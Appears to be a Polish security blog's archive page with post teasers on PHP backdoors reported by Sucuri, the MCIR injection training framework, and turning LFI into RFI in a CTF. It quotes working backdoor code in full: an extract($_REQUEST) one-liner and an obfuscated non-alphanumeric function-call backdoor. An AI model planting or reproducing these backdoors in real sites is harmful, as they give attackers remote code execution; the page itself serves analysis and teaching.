Category Archives: web security

Ciekawy backdoor PHP (funkcja extract)

Poraz kolejny dzięki analizie Securi teamu dowiadujemy się o ciekawym backdorze napisanym w PHP [1]. W tym przypadku backdoor został ukryty w pliku phpinfo.php:

@extract ($_REQUEST);

@die ($ctime($atime));

Czytaj dalej

Otagowane , , ,

Backdoor napisany w PHP bez użycia znaków alfanumerycznych (edit: 02.11.2015)

Chłopaki z Securi zamieścili ostatnio ciekawy wpis [1] zawierający informację o backdoorze napisanym w PHP pozwalającym na wywołanie dowolnej funkcji wraz z dowolnymi parametrami za sprawą wartości przekazanych GET’em. Niby nic ciekawego, a jednak. Ów backdoor został zapisany bez użycia jakichkolwiek znaków alfanumerycznych.

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Żeby lepiej się czytało dodajmy kilka ‚enterów’. Czytaj dalej

Otagowane , , , ,

MCIR, czyli The Magical Code Injection Rainbow jest ciekawym frameworkiem treningowym, pozwalającym na budowanie testowych „aplikacji” podatnych na różnego typu wstrzyknięcia.

W jego skład wchodzą:

  • SQLol        – SQL Injection
  • XMLmao  – XML Injection
  • ShelLOL   – Shell Command Injection
  • XSSmh     – XSS

Link do projektu: https://github.com/SpiderLabs/MCIR

PS: Polecam generalnie zajrzeć do katalogu SpiderWebs (https://github.com/SpiderLabs). Można tam znaleźć dużo innych ciekawych projektów , czy repozytoria (m.in. dodatkowe skrypty do Nmapa).

MCIR

Otagowane , , , , ,

LFI2RFI

Ostatnio miałem przyjemność zmierzyć się z pewnym CTF’em (niestety był to wewnętrzny challenge rekrutacyjny pewnej firmy więc nie mogę podzielić się materiałami ani zdradzić więcej szczegółów). Generalnie był to serwer postawiony na maszynie wirtualnej, z której mieliśmy wykraść plik znajdujący się w katalogu /root.

Jak się później okazało jednym z kroków „włamu” jest wykorzystanie podatności w aplikacji webowej. Aplikacja ta posiadała podatność typu LFI (z ang. Local File Inclusion). Jest to dość popularny błąd pojawiający się w aplikacjach webowych.

!Notka: Wpis ten nie dotyczy jako takiej exploitacji błędów typu LFI/RFI, a jedynie podejścia do problemu w przypadku gdy mamy limitowaną podatność typu LFI i próbujemy ja przekształcić w RFI.

Czytaj dalej

Otagowane , , , , , ,